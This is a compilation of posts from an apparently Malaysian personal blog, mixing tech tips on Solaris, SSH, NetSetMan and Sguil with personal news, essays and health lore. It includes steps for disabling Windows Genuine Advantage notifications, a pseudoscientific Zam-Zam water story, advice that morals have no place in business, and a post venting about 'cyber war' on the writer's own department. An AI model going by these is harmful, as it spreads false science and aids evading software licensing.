NETSETMAN

NETSETMAN
www.netsetman.com

JUST FOUND IT OVER THE INTERNET, REALLY GOOD TOOLS TO YOU WHO KEEP CHANGING IP biggrin.gif

FROM: http://www.netsetman.com/
Are you tired of changing your network configuration every day on your notebook or computer?
The same procedure every day?On the go : changing..., at home: changing..., at the Internet café: changing...,
visiting a friend: changing...
Then NetSetMan is your solution. It will do the work for you.

Reduced: 91% of original size [ 560 x 324 ] - Click to view full image



NetSetMan is freeware for your non-commercial purposes. !

That means you can use it for free at home, at school, at university, at a LAN-party, at a noncommercial club etc. As long as you don't save paid time.

If you'd like to use it in a commercial way you need to buy NetSetMan Pro. This includes using it at work, on your company notebook or even on your own notebook if you use it to make money in any way. Or if you just need the additional features the Pro version includes.


NetSetMan is a network settings manager which can easily switch between 6 different, visually structured profiles including:

* IP Address
* Subnet Mask
* Default Gateway
* Preferred & Alternate DNS Server
* Computer Name
* Workgroup
* DNS Domain
* WINS Server
* Default Printer
* Run Scripts

Additionally only in the Pro version

* Network-Domain
* Complete Proxy Settings (Internet Explorer & Firefox)
* Home Page (Internet Explorer & Firefox)

It is not only useful and effective but also easy and intuitive to handle.
The entry fields remind of the Windows "Internet Protocol (TCP/IP) Properties" but it's much easier to fill in the addresses. Current settings can easily be retrieved.

All settings and changes are saved automatically in a separate file (settings.ini) so a backup, transfer or upgrade to another version is absolutely no problem.

DOWNLOAD LINK: http://www.netsetman.com/stats/getfile.php?id=1

The 7th sense

The 7th sense


Today is 7th December, im turn 24 today. What happens in the last 24 years is not mystery i know what im doing now and what im going to achieve soon.

p/s: the best yet to become


Who the f***

PECAH RUMAH - LAHABAU BETUL !!

Yesterday morning some f**ker broke into my house when im still in my house in my room sleeping. What missing?


My 3 weeks old laptop were gone - sh**. Why we dont have or i dont have CSI kit at home so i can find whick f**ker broke into my house.

p/s: Sape la ni punya keje, suspek orang antara tingkat 2 hingga tingkat 5 apartment aku sendiri. Damn i miss my laptop already since this is the 1st time i got very high specs laptop to do my job with 1gb memory, duo core processor and 80gb disk- damn i can put 4 os running at same time on VMWare. Kepada pencuri tersebut, aku sumpah otak ko jadi cam hardisk lepas 3 tahun koyak pastu tak leh repair jadi gila la tu.

Where are the young Malays?

Where are the young Malays?

Nik Nazmi Nik Ahmad

2006

A few months ago, a human resource manager at an international bank approached me. He wanted my help to find top young Malays for the bank’s fast-track management programme. “Where are the young Malays?” he asked.

One of the major cornerstones of the New Economic Policy (NEP) is the scholarship system. While scholarships existed prior to the NEP, it was only after the NEP in the 1970s that a large-scale government scholarship programme was initiated to send students to the top universities around the world. It had a huge impact not only on the NEP but also on our developmental success as a whole.

These scholars later joined the civil service and government-linked companies (GLCs), and many later left for the private sector as their contract ended and the opportunity beckoned in Malaysia Incorporated. The backbone of the Malay middle class today is largely a product of this system.

This system is still a crucial feature of our public policy. The best Form Five students are identified by their SPM performance, and then selected for preparatory and foundation studies before being sent to the top universities around the world. Upon graduation, they will come back to serve their respective sponsors for about five to 10 years.

But in conversations I had with various people — investment bankers, management consultants, young entrepreneurs, and chief executive officers — there’s a realisation that there needs to be a radical new approach. The current model results in an inefficient use of human resource (predominantly Malay at that), and may not be the most effective way to meet the objective it was originally designed for.

While millions of ringgit of taxpayers’ money have been invested to give the best possible tertiary education to these crème de la crème, many of them end up caged in jobs that do not fully make use of their potential. In business terms, this is a poor return on investment.

At the same time, with the advent of globalisation and liberalisation, job opportunities for young graduates are wider and more competitive these days. But while students who are privately sponsored or scholars who are not bound to their sponsors are able to reap the benefits of this development, sponsored students find themselves at a disadvantage.

That was why a young investment banker lamented that an often overlooked reason for the lack of young Malay graduates in multinationals and private companies is that a large number of them find themselves bound to their respective sponsors. Yes, other reasons are at play, such as the quality of graduates and discrimination, but those have often been discussed.

One might ask: Isn’t their contract of service only for an initial five to 10 years? They can certainly explore other opportunities after the end of their contracts. Two problems arise here: First, they have missed out at the earliest opportunity to do so, and secondly, while they may be free of their contract, they are now in a comfort zone — bound by their financial and personal commitments — and tend to become risk-averse.

But let’s go beyond whining and ranting. For all the limitations of the current set-up, one cannot overlook the fact that the interests of the sponsors — be they the government or GLCs — must be taken into account. It’s unreasonable to expect them to invest so much money every year in human capital, only for them not to reap the returns.

There is a practical way forward, provided we allow ourselves to think outside the box. I have learnt that some sponsors are actually looking into these alternatives as they too realise the problems that I have raised above.

One way is to provide a flexible period for graduates to serve their contract of service. It can still be five to 10 years, but they are allowed to choose to finish their contract terms anytime within, say, 15 to 20 years. Therefore, the graduates have the choice to either serve the sponsors immediately, or to postpone their service while working in a top private firm, either locally or overseas. Even if they choose to start with their sponsors, they should be allowed to take career breaks to gain experience in other private firms or sabbaticals to attend top graduate schools in the course of their employment.

Admittedly, there is a risk that some might land a well-paying job which would allow them or the employer to buy out the contract. This is a real risk, but since part of the purpose of the whole programme was to produce Malay professionals, the government and GLCs should consider this as part of their contribution to the national interest, especially since their financial outlay is being reimbursed.

Furthermore, many GLCs have diverse subsidiaries and associated companies, and they should allow their scholars to gain different experiences and perspectives through these different companies. This will expose these graduates to the best practices locally and internationally in order for them to develop professionally and contribute to their respective sponsors.

Another way is to provide a fast-track system in the public sector and GLCs for their scholars. This will be an important motivational factor for the scholars, while at the same time allowing the sponsors to leverage on their investment. Combined with the first suggestion, the GLCs will also be able to benefit from the experience, perspective and skills gained by the scholars in various top-class firms and organisations.

This will solve two burning issues that plague the current set-up — a dearth of top young Malay graduates in the private sector, as well as the low return on investment for the government and GLCs on the scholarship programme.

Then, when someone asks where the young Malays are, we can confidently say they are working in the top multinational and private firms around the world, as well in the public sector and GLCs with a competitive and forward-looking career path. And definitely, not becoming Mat Rempits! Isn’t that the true spirit of the NEP?

source : www.niknazmi.com and was published in The Edge newspaper on October 2006 where i read this for the first time.

p/s: This is very true, u can ask the Petronas Scholar that are not in engineering - they were put anywhere in the organization and for me this is waste. Bright students were given a full scholar to continue their study and after that have to serve with their organization and working in the area that are totally different from their studies - they can't do what have been thought in the University err for me this is ridicilous.
Nik Nazmi said "While millions of ringgit of taxpayers’ money have been invested to give the best possible tertiary education to these crème de la crème, many of them end up caged in jobs that do not fully make use of their potential. In business terms, this is a poor return on investment."

Singapore

First Impression

Last time i went to Singapore around 12 years ago when im still in primary school with my parents to Sentosa Island. Last 2 days in Singapore for Training is a good one for me, Orchard road is happening for Christmas Preparation. And one more things i spotted was so many 'mat saleh' there they all working there i guess.

Frm Left : S'pore guy, Indonesia Sun Eng, Me, Trainer (mark), Indonesia Eng and Philippine Sun Eng.

p/s: Its damn hard to get a Taxi after office hour here but their road don't have traffic jam like KL dats a good thing :)

Mac OS/Linux/Windows Single Sign-On

Mac OS/Linux/Windows Single Sign-On

Centralized authentication greatly simplifies network administration. This post teaches how to log in to a Mac or Linux computer using centrally managed user accounts from a Windows Active Directory domain controller. With this configuration, the same Windows user accounts can be used to log in to any of the three operating systems, Mac OS, Linux, or Windows, with the same user network folder auto-mounted.

Source: http://weblog.bignerdranch.com/?p=6

DECISION MAKING

DECISION MAKING

Decision making is the cognitive process leading to the selection of a course of action among alternatives. Every decision making process produces a final choice. It can be an action or an opinion. It begins when we need to do something but we do not know what. Therefore, decision-making is a reasoning process which can be rational or irrational, and can be based on explicit assumptions or tacit assumptions.
Common examples include
shopping, deciding what to eat, when to sleep, and deciding whom or what to vote for in an election or referendum.
Decision making is said to be a psychological construct. This means that although we can never "see" a decision, we can infer from observable behaviour that a decision has been made. Therefore, we conclude that a psychological event that we call "decision making" has occurred. It is a construction that imputes commitment to action. That is, based on observable actions, we assume that people have made a commitment to affect the action.
Structured rational decision making is an important part of all science-based professions, where specialists apply their
knowledge in a given area to making informed decisions. For example, medical decision making often involves making a diagnosis and selecting an appropriate treatment. Some research using naturalistic methods shows, however, that in situations with higher time pressure, higher stakes, or increased ambiguities, experts use intuitive decision making rather than structured approaches, following a recognition primed decision approach to fit a set of indicators into the expert's experience and immediately arrive at a satisfactory course of action without weighing alternatives.
Due to the large number of considerations involved in many decisions, computer-based
decision support systems have been developed to assist decision makers in considering the implications of various courses of thinking. They can help reduce the risk of human errors. The systems which try to realize some human/cognitive decision making functions are called Intelligent Decision Support Systems (IDSS), see for ex. "An Approach to the Intelligent Decision Advisor (IDA) for Emergency Managers, 1999".

MY post:
God please help me in making this decision hopefully this is the best for me and my future. This is so difficult, between money and interest which one would you take.

Fakta: Bahasa Melayu Bahasa Utama Dunia

Bahasa Melayu Bahasa Utama Dunia
(diolah daripada Dewan Masyarakat Januari 2006)


Fakta 1 -Anggaran oleh David Crystal dalam The Cambridge Encyclopedia of Language (1987) ada 3000 hingga 10,000 jumlah bahasa di dunia. Terdapat 6000 daripadanya masih digunakan sebagai bahasa pertuturan harian

Fakta 2 -Daripada jumlah itu,hanya 20 bahasa sahaja bertaraf rasmi yang penuturnya berjumlah lebih daripada50 juta orang. Bahasa Melayu termasuk dalam senarai 20 bahasa utama dunia ini.

Fakta 3 -Jumlah penutur bahasa Melayu di pelbagai peringkat penguasaan di seluruh dunia adalah lebih daripada 280 juta orang.


Fakta 4 -Berdasarkan anggaran in i, bahasa Melayu diiktiraf sebagai bahasa ke5 terbesar di dunia selepas;
1.Bahasa Inggeris(1.4 bilion penutur)
2.Bahasa Cina(lebih 1 bilion penutur)
3.Bahasa Hindi(700 juta penutur)
4.Bahasa Sepanyol(300 juta penutur)
5.Bahasa Melayu(280 juta penutur)
Mendahului bahasa-bahasa penting lain seperti Perancis,Jepun, Jerman, Korea dan Itali.

Fakta 5 -Hanya 8 bahasa sahaja penyebarannya merentasi sempadan menjadi bahasa rasmi ataupun salah satu bahasa rasmi di beberapa buah negara lain. Iaitu bahasa Melayu,Inggeris, Perancis, Sepanyol, Arab, Rusia, Portugis dan
cina.

Fakta 6 -Daripada 8 bahasa hanya bahasa Melayu sahaja menjadi
bahasa rasmi di Malaysia, Indonesia, Brunei, Singapura dan diiktiraf sebagai bahasa kebangsaan tunggal dalam perlembagaan negara-negara itu.

Fakta 7 -Empat kriteria ukuran bahasa itu bahasa utama dunia ataupun
tidak.1,jumlah penutur bahasa itu besar. 2,taraf bahasa itu sebagai
bahasa rasmi di beberapa buah negara ataupun di negara yang bukan
tempat asal bahasa.3,status atau pentingny a bahasa itu sebagai alat
perhubungan antarabangsa.4,setakat manakah majunyanegara yang
menggunakan bahasa itu sebagai bahasa rasmi.Bahasa Melayu memenuhi
semua kriteria itu.

Fakta 8 -HANYA Bahasa Melayu sahaja tidak tersebar merentasi sempadan
negara asalnya melalui PENJAJAHAN. Ia berkembang menjadi lingua-franca
kerana kedudukan geografiknya yang strategik di Selat Melaka.
Bahasa Melayu dipilih sebagai bahasa penyatuan di Indonesia sejak
1928 dan diisytihar sebagai bahasa rasmi pada 1945. Mengatasi
bahasa Jawa yang lebih ramai penuturnya.

Fakta 9 -Di seluruh dunia, ada lebih kurang 129 pusat pengajian bahasa Melayu- di Eropah, Amerika Syarikat, Cina, Jepun, Rusia, Korea, Australia, New Zealand dan lain lain.

Fakta 10 -Kekuatan bangsa Melayu terletak pada bahasa ini. Orang Melayu akan lebih maju dan lebih kreatif akalnya apabila mereka berfikir dalam bahasa ini- bahasa ibundanya-seperti bangsa lain yang maju kerana mereka berfikir, mengarang, mencipta ilmu, sains dan teknologi dalam bahasa mereka sendiri.

sumber:
Petikan Kaca Di Jendela oleh Datuk Dr. Hassan Ahmad,Dewan Masyarakat Januari 2006

p/s: kita akan lebih percaya kerana faktanya daripada bangsa asing. bukankan begitu?

The Best Place to Learn Volume Manager

This is the place i mention above :

http://www.unixway.com/vm/solarisvm.html

This site cover the volume manager using the Solaris Disk Suite and also using the Veritas Volume Manager really great site to who are wanna start learn those two Volume Manager in Solaris.


p/s: I've tender from CSA

The Philosophy of Friendly



UNIX is user friendly. It's just selective about who its friends are

SGUIL - The Analyst Console for Network Security Monitoring.

SGUIL - The Analyst Console for Network Security Monitoring.
By Analysts -- For Analysts -- Current Version 0.6.1

Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides realtime events from snort/barnyard. It also includes other components which facilitate the practice of Network Security Monitoring and event driven analysis of IDS alerts. The sguil client is written in tcl/tk and can be run on any operating system that supports tcl/tk (including Linux, *BSD, Solaris, MacOS, and Win32).


Want to learn more about Network Security Monitoring (NSM)? Then check out Richard Bejtlich's recently released book, The Tao of Network Security Monitoring: Beyond Intrusion Detection. An excerpt reads:

Network security monitoring (NSM) equips security staff to deal with the inevitable consequences of too few resources and too many responsibilities. NSM collects the data needed to generate better assessment, detection, and response processes--resulting in decreased impact from unauthorized activities.

For those interested in seeing how sguil looks and feels, download the client and connect to the sguil daemon (sguild) at demo.sguil.net on port 7734. Enter any username and password when prompted and select the sensor named "reset". In the console, you will see a User Messages tab. Within this tab you can communicate with other connected analysts as well as the irc channel #snort-gui on irc.freenode.net.

Download it here http://sguil.sourceforge.net/index.php?page=download

p/s: this is a really cool stuff :D excited

The book: Hacker's Challenge 3

The book

Hacker's Challenge 3 (Paperback)
by David Pollino, Bill Pennington, Tony Bradley, Himanshu Dwivedi



Hacker's Challenge 3

The ultimate test of hacking skills for IT security professionals

This unique volume helps you determine if you have what it takes to keep hackers out of your network. Twenty brand-new, real-life security incidents test computer forensics and response skills--all in an entertaining and informative style. The latest security topics are covered, including phishing and pharming scams, internal corporate hacking, Cisco IOS hacks, wireless hacks,VoIP hacks,Windows, Mac OS X, UNIX/Linux, and much more!

Each challenge unfolds like a chapter from a novel and includes details of the incident—how the break-in was detected, evidence, and background such as log files and network diagrams--and is followed by a series of questions for you to solve. Detailed solutions for all the challenges are included in the second part of the book.

p/s:most fun security book

Azam Baru

Walaupun hari ni belum tahun baru tapi aku dah ada azam baru yang akan aku start esok. Now aku akan continue cita-cita asal aku kepada security consultant sekarang dunia unix/linux aku macam tak bawak aku ke mana .................. mulakan activity penggodaman ... aku bosan dah duk ofis ni...

p/s: esok aku nak declare hari perang cyber kat department aku - start dengan solaris - kenapa aku rasa nak menendang je ni geram pun ada damn!

4 Golden Lessons From The Apprentice by A.Williams

4 Golden Lessons From The Apprentice by A.Williams

Remember Melissa from The Apprentice? Yeah, neither do I. She did something unthinkable during some random task on the first episode of last season and got the axe. The same happened to Chris, Jennifer W., poor ol' Toral, and every other Tom, Dick and Harry who did something completely half-witted on national television.

Everyone watches the show and rolls their eyes in disbelief, completely convinced that they can outperform any one of these mindless candidates. But is this true? When the pressure's on, would you be able to impress dear ol' Donald and avoid the wrath of his spine-tingling, hair-raising catchphrase, "You're fired?"

Whether you find yourself in the audition room for the next Apprentice or in the conference room down the hall from your cubicle, here are some of the golden rules to succeed in business, Trump-style.

1- Keep it simple
It's Monday morning, 9 a.m. Your boss suddenly announces you' re going to be presenting your proposal to the company shareholders tomorrow. The sound of his, "You better make it good, Johnson," keeps resonating in your ears. In the midst of heart-pounding panic and a clammy, cold sweat, you think, "This has to be big -- I want music, I want effects, I want costumes!" But let's put a hold on this Broadway production before you make a fool of yourself.

The first golden rule of becoming successful in business is keeping it simple. Bigger is not necessarily better. For illustrative purposes, let's take a look at a past episode of The Apprentice. The teams were told they had to create a campaign to generate the most customer phone calls to a Shania Twain perfume hotline. One team hired people to wear sandwich boards and advertise the campaign by word-of-mouth, while the other team thought outside the box, plastering Shania Twain posters all over horse and buggy carriages, ultimately experiencing a shameful defeat.

The lesson of this story: people can sell, horses can't. While the music, effects and costumes might seem like an impressive, "outside-the-box" kind of move, you're better off going back to basics (i.e. a well-rehearsed speech, some handouts organized in drab, gray folders and maybe a short PowerPoint presentation). This foolproof method will have you lunching with the execs in no time.

There are reasons why a good suit is associated with success and not stupidity...

2- Research, research, research
Going into a presentation or writing a report without doing the proper research is on par with crossing the street blindfolded -- you're simply screwed.

Apprentice teams who missed out on executive interviews for marketing tasks usually ended up suffering humiliating losses ( la Capital Edge's loss after skipping an interview with executives for a Star Wars campaign).

You may have a brilliant idea for that BMW campaign, but all those bells and whistles might prove pointless if you haven't performed the necessary research. Put aside your great models in lingerie and dancing bears idea for a while, and have a chat with the BMW executives -- what's their target audience? What do they envision? What would they hate? If you get the scoop straight from the source, you'll be sure to impress.

3- No more Mr. Nice Guy
Have you seen Office Space? Not only does it portray the truth about life in the workplace, but it also shows a man living out every disgruntled worker's fantasy -- telling his boss exactly what he thinks. You'd think this would get him fired, but, instead, he gets promoted.

If Office Space taught me anything, it's that most jobs will leave you miserable and that nice guys definitely finish last.

Let's apply this idea to the ever-so-compelling Apprentice. Remember that episode when Excel stole the megapho nes from Capital Edge, destroying their competitor's campaign? While many of us with a conscience wouldn't even fathom the idea of stealing to win, these contestants didn't think twice. The outcome of this devilishly sly act? A congratulatory pat on the head by none other than Donald Trump himself, along with a landslide victory.

What's the moral of this story? Well, there isn't one -- morals have no place in business. It's a dog-eat-dog world, so if you think you have the perfect plan to sabotage Billy's promotion and nab it for yourself, don't bat an eye -- Trump says it's okay.

4- Dress for success
This might be a shallow lesson, but it's a golden one nonetheless. If you dress the part, you'll feel the part; and if you feel the part, you'll eventually become the part. So, go downtown and hit some swanky shops. You're going to need the basics -- a black suit and a blue suit (single-breasted jacket with three buttons, flat-fr ont pants), black leather shoes (no laces), and a varied color palette of dress shirts and ties (with no distracting patterns). It doesn't end with clothing, though. You must always be well groomed (neat hair, clean shaven) and do not overload on the after-shave.

You don't need to be tall, dark and handsome to succeed in business, but you need to appear in such a way that people will take you seriously.

I don't know about you, but I can't recall an unattractive, badly dressed contestant winning the big Apprentice-ship. After all, that guy with the bowties was fired well into the beginning of the season.

putting it all together

Each lesson might be difficult to integrate into your daily work routine at first, but if you ease your way into each lesson, one at a time, you'll notice an immediate improvement in your work performance. So go ahead, give 'em a try and make "The Donald" proud.


p/s:
No more Mr. Nice Guy , be meant

Solaris: Recovering From Soft Partition Problems

Recovering From Soft Partition Problems

The following sections show how to recover configuration information for soft partitions. You should only use these techniques if all of your state database replicas have been lost and you do not have a current or accurate copy of metastat -p output, the md.cf file, or an up-to-date md.tab file.

How to Recover Configuration Data for a Soft Partition

At the beginning of each soft partition extent, a sector is used to mark the beginning of the soft partition extent. These hidden sectors are called extent headers and do not appear to the user of the soft partition. If all Solaris Volume Manager configuration is lost, the disk can be scanned in an attempt to generate the configuration data.

This procedure is a last option to recover lost soft partition configuration information. The metarecover command should only be used when you have lost both your metadb and your md.cf files, and your md.tab is lost or out of date.


Note - This procedure only works to recover soft partition information, and does not assist in recovering from other lost configurations or for recovering configuration information for other Solaris Volume Manager volumes.



Note - If your configuration included other Solaris Volume Manager volumes that were built on top of soft partitions, you should recover the soft partitions before attempting to recover the other volumes.


Configuration information about your soft partitions is stored on your devices and in your state database. Since either of these sources could be corrupt, you must tell the metarecover command which source is reliable.

First, use the metarecover command to determine whether the two sources agree. If they do agree, the metarecover command cannot be used to make any changes. If the metarecover command reports an inconsistency, however, you must examine its output carefully to determine whether the disk or the state database is corrupt, then you should use the metarecover command to rebuild the configuration based on the appropriate source.

  1. Read the Background Information About Soft Partitions.

  2. Review the soft partition recovery information by using the metarecover command.

    metarecover component-p {-d }

    In this case, component is the c*t*d*s* name of the raw component. The -d option indicates to scan the physical slice for extent headers of soft partitions.

    For more information, see the metarecover(1M) man page.


p/s: soft partitions is the best way to extend the 7 slices in solaris volume manager, it has capability to slice it to how many space that we want but it will slow down the performance a little bit

SSH: TIME_WAIT problem

The TIME_WAIT problem


Sometimes a forwarded port mysteriously hangs around after the forwarding SSH session has gone away. You try a command you've used successfully several times in a row and suddenly get an error message:
$ ssh1 -L2001:localhost:21 server.example.com
Local: bind: Address already in use
(This happens commonly if you're experimenting with port forwarding, trying to get something to work.) You know that you have no active SSH command listening on port 2001, so what's going on? If you use the netstat command to look for other listeners on that port, you may see a connection hanging around in the TIME_WAIT state:
$ netstat -an | grep 2001
tcp 0 0 127.0.0.1:2001 127.0.0.1:1472 TIME_WAIT
The TIME_WAIT state is an artifact of the TCP protocol. In certain situations, the teardown of a TCP connection can leave one of its socket endpoints unusable for a short period of time, usually only a few minutes. As a result, you cannot reuse the port for TCP forwarding (or anything else) until the teardown completes. If you're impatient, choose another port for the time being (say, 2002 instead of 2001) and get on with your work, or wait a short time for the port to become usable again.


source: http://www.unix.org.ua/orelly/networking_2ndEd/ssh/ch09_02.htm

p/s: This is why sometimes we faced this issue "
Local: bind: Address already in use"

SKIP - Simple Key management for Internet Protocols

SKIP - Simple Key management for Internet Protocols

SKIP, which provides IP-Level cryptography, much like SSH, is available for Linux. A quick overview from http://www.skip.org states:

SKIP secures the network at the IP packet level. Any networked application gains the benefits of encryption, without requiring modification. SKIP is unique in that an Internet host can send an encrypted packet to another host without requiring a prior message exchange to set up a secure channel. SKIP is particularly well-suited to IP networks, as both are stateless protocols. Some of the advantages of SKIP include:
  • No connection setup overhead

  • High availability - encryption gateways that fail can reboot and resume decrypting packets instantly, without having to renegotiate (potentially thousands) of existing connections

  • Allows uni-directional IP (for example, IP broadcast via satellite or cable)

  • Scalable multicast key distribution

  • SKIP gateways can be configured in parallel to perform instant-failover

There is a wealth of information available at http://www.skip.org as well as the actual Linux implementation available at http://www.tik.ee.ethz.ch/~skip/



INFO: Kaitan Tidur Dan Keletihan



INFO: Kaitan Tidur Dan Keletihan
source: mailing list

Badan letih dan lesu walaupun kita merasakan telah berehat dan tidur secukupnya. Mengapakah hal ini berlaku?. Lazimnya kita bangun awal pada hari bekerja dan bangun lewat pada hari tidak bekerja atau cuti umum. Kita seolah-olah "balas dendam" kerana merasakan tidak cukup tidur pada hari bekerja. Namun yang berlaku adalah sebaliknya, badan kita semakin letih dan lesu.

Sebenarnya, pola tidur sedemikian telah mengganggu putaran biologi dalam badan anda atau "biological clock". Gangguan inilah yang menyumbang kepada keletihan tubuh badan anda. Menurut Timothy Rogers, Pengarah Pusat Kajian Masalah Tidur dari Hospital Henry Ford di Detroit, AS, badan kita mengeluarkan sejenis hormon kecergasan yang dipanggil cortisol. Sekiranya anda bangun tidur jam 7 pagi, cortisol akan dirembeskan 3 jam awal iaitu jam 4 pagi sebagai persediaan untuk anda bangun dan aktif.

Oleh itu, sekiranya anda mengamalkan corak tidur seperti di atas, jadual cortisol terganggu. Cortisol telah dikeluarkan pada jam 4 pagi tetapi pada hari itu anda bangun jam 11 pagi. Akibatnya, ketika anda bangun hormon kecergasan telah tiada. Anda akan merasa letih dan lesu walaupun tidur melebihi 8 jam sehari.

Jadi, jika anda mahukan kecergasan berpanjangan, jagalah amalan tidur anda agar tidak mengganggu putaran biologi di dalam tubuh anda. Tiada gangguan ini bermakna anda akan cergas, bertenaga dan aktif.



p/s: Patut la aku tdo lama letih :D
Selamat Berpuasa

Air Zam-Zam < dari kajian seorang Profesor

Kelebihan Air Zam-Zam dari kajian Profesor Jepun

Air merupakan salah satu rahmat Allah kepada manusia, Manusia tidak boleh hidup tanpa air, dan manusia tidak boleh hidup tanpa rahmat dari Allah. Ustaz kemudian bercerita bahawa dia telah berkesempatan menghadiri satu seminar mengenai AIR yang berlangsung di Hotel Istana baru-baru ini yang mana kebanyakan participant yang hadir terdiri daripada orang bukan Islam kecuali 2 orang (Ustaz Abdullah dan seorang Pensyarah dari UM).

Penceramahnya seorang Profesor yg pakar tentang air dari Jepun.
Beliau menunjukkan hasil kajiannya mengenai air, beberapa slide
ditunjukkan dan dipancarkan dilayar putih kepada hadirin sekelian.
Sampel-sampel air yang diambil dari berbagai sumber air (sungai,
laut,perigi dan bermacam lagi).

Maka terpancarlah berbagai-bagai rupa bentuk susunan molekul-molekul air tersebut. Ada yang berupa seolah-olah seperti jin tetapi
samar-samar, tidak begitu jelas (dengan telinga yang besar, bertanduk dan sebagainya)rupa yang menggerunkan dan menakutkan. Lalu Profesor itu berkata "banyak lagi sampel-sampel air ! yang lain tetapi rupa molekul-molekulnya hampir sama, sekarang saya nak tunjukkan sampel air yang berlainan dari sampel-sampel air yang saya tunjukkan tadi" Profesor itu pun tunjukkan, maka terpancarkan satu rupa bentuk molekul air yang tersusun cantik berupa seolah-olah seperti berlian (bersegi-segi) ,bersinar- sinar dan sinarannya mengeluarkan warna-warna yang menarik melebihi 12 warna.

MasyaAllah, cantik. Lalu profesor bertanya "Siapakah di antara kamu semua ya! ng tahu sampel air apakah ini".
Hadirin semua senyap, dan kemudian, Pensyarah dari UM mengangkat tangan dan
menjawab "saya rasa itu adalah sampel air zam-zam".
Profesor berkenaan memanggil Pensyarah tersebut naik ke atas dan bertanya "Berikan saya sebab kenapa awak berkata air itu adalah air zam-zam.
"Kerana air zam-zam adalah air yang termulia didunia ini" Jawab Pensyarah. Profesor berkata "Saya tak tahu samada betul atau tidak air zam-zam itu mulia tetapi memang betul ini adalah sampel air zam-zam." Kemudian Professor mengatakan bahawa, kata-kata juga dapat mempengaruhi rupa bentuk molekul-molekul air.

Lalu didalam dewan itu mereka membuat experiment bagaimanakah yang dikatakan kata-kata dapat menpengaruhi rupa bentuk molikul-molikul air. Semua hadirin dikehendaki membaca sesuatu kepada air mineral masing-masing. Lalu seorang volunteer bangun untuk menguji bagaimana rupa air yang telah dibaca. B! ila ditunjukkan diskrin, nampak molikul air membentuk seolah-olah seperti tokong cina (dengan janggut yg panjang dan perut yg buncit).
Bila tiba giliran Ustaz, air yang dibaca dengan Al-Fatihah, Selawat dan Ayat Kursi maka nampaklah rupa molikul air seperti berlian dan berkilau-kilau.

... Subhanallah. Lalu Ustaz disuruh oleh Profesor menbaca sebarang ayat/kata-kata yang tidak baik...maka nampaklah diskrin molikul air berupa seperti sel-sel barah.
Subhanallah. .... daripada ceramah yang Ustaz sampaikan ini marilah
kita sama-sama mengambil iktibar daripadanya. Ini adalah kata-kata dari Ustaz Abdullah : "Jika hendak air itu merasa manis maka masukkanlah gula, jika hendak air itu berwarna maka masukkanlah pewarna dan jika hendak air itu mulia maka masukanlah ayat-ayat yang mulia kepadanya".

How to Remove Windows Genuine Advantage Notifications

How to Remove Windows Genuine Advantage Notifications


Windows genuine advantage notifications occur when your computer hasn't passed the validation test. The validation test can be failed due to being sold a pirated (non-genuine) copy of XP, or because you have changed your XP product key to a software-generated key. The failed validation installs three types of notifications on your computer: one on the log in screen, one log in timer, and one balloon. It also stops updates from Microsoft and disables your ability to install IE7 and Windows Media Player 11. This solution can get rid of all three notifications, even though you will still not be able to update. Unfortunately, you can only update if you buy a valid Microsoft product key again.

Steps

  1. If you have only just installed Windows Genuine Advantage notifications, simply using the system restore function will remove the program. Then refuse to accept the WGA update next time Windows updates... otherwise, proceeed as detailed below.
  2. # Open System32 by either A or B of the following methods:

    • a)
      Click "Start", "Run", then type-in "System32". Click "Okay".
    • b) Find System32 manually by clicking "Start" > "My Computer" > "(X:)" (Replacing "X" with the drive letter of the host of Windows) > "Windows" > "System32".

  3. In "System32", go to "Tools" > "Folder options" > click on the tab, "View" > Uncheck "Hide extensions for known file types". Now you can begin...
  4. Check to make sure the window that comes up has a full screen of various files. The files are in alphabetical order, which makes it easier to locate the specific file.
  5. Find "WgaLogon.dll" and rename it "WgaLogon.dll.bak".
  6. Create an empty copy of WgaLogon.dll:

    • Right click on a blank space in System32 and select "New" > "Text Document".
    • Leave the text document empty and label it "WgaLogon.dll". Press Enter (on your keyboard).
    • You may get a warning from the above step that says, "If you change a file name extension, the file may become unusable. Are you sure you want to change it?". Click "Yes" on this warning.
  7. Be ready to complete the next two steps very quickly! Find "WgaTray.exe" in "System32" and delete it. You will then have 5 seconds to find "WgaTray.exe" in the Task Manager (the next step).
  8. Immediately open Task Manager. You can do this by pressing the Ctrl, Shift, and Esc keys simultaneously or right clicking the Taskbar and selecting "Task Manager". Click on the process tab and end "WgaTray.exe".
  9. Restart your computer once you have finished. All the notification messages should be gone.


Tips

  • This process will only get rid of the notifications, and will not validate your copy of XP. It will remove the timer at the beginning of your XP log on, the white notice on the log on screen, and the annoying yellow star that appears in the bottom right corner of the screen.
  • This is easier to do if you have someone reading the steps to you while you do it.
  • You may need to Find Hidden Files and Folders in Windows to get to System32 manually.
  • If task manager programs are moving, click the title of the "user name" column to freeze them.
  • If you are having problems after this, disable the updates before rebooting.
  • There is a program called RemoveWGA which does all of this for you. Just run the program, click yes, and you're done. (See External Links, below.)
  • If you have problems changing files in the System32 directory, you will have to turn off "system restore". "Start" -> "Control Panel" -> "System" -> "System Restore" -> Check the "Turn off system restore" check box.


Warnings

  • Do not edit anything but this in System32, or it could cause system start up failure.
  • If you are new to computers, do not attempt this because if you modify the wrong file you may crash your computer.

‘Pengendali laman blog ibarat penembak curi’ > my comment

‘Pengendali laman blog ibarat penembak curi’


KUALA LUMPUR: Datuk Shaziman Abu Mansor semalam mencabar pengendali laman forum atau blog yang berselindung di sebalik nama samaran untuk tampil dan berdebat secara terbuka mengenai pelbagai isu semasa.


Timbalan Menteri Tenaga, Air dan Komunikasi itu berkata tindakan kumpulan yang mengkritik pihak tertentu termasuk kerajaan tetapi enggan mendedahkan identiti sebenar seperti penembak curi.

Katanya, kumpulan itu harus menghentikan kerja yang sia-sia dan tidak bertanggungjawab itu.



“Bukannya berlindung di sebalik blog atau laman web yang tidak bertanggungjawab,” katanya menjawab soalan tambahan Dr Tan Seng Giaw (DAP-Kepong) di Dewan Rakyat semalam.

Tan meminta kerajaan mengawal tindakan pihak yang tidak bertanggungjawab menyalahgunakan Internet untuk tujuan tidak baik.

Shaziman berkata, kerajaan pada dasarnya tidak mempunyai peruntukan undang-undang mengawal internet termasuk laman forum dan blog berikutan Akta Komunikasi dan Multimedia 1998 serta jaminan Koridor Raya Multimedia (MSC), menyekat penggunaan Internet.

"Sehubungan itu, saya mengharapkan kebijaksanaan rakyat menilai kesahihan pelbagai isu yang digembar-gemburkan di dalam internet.

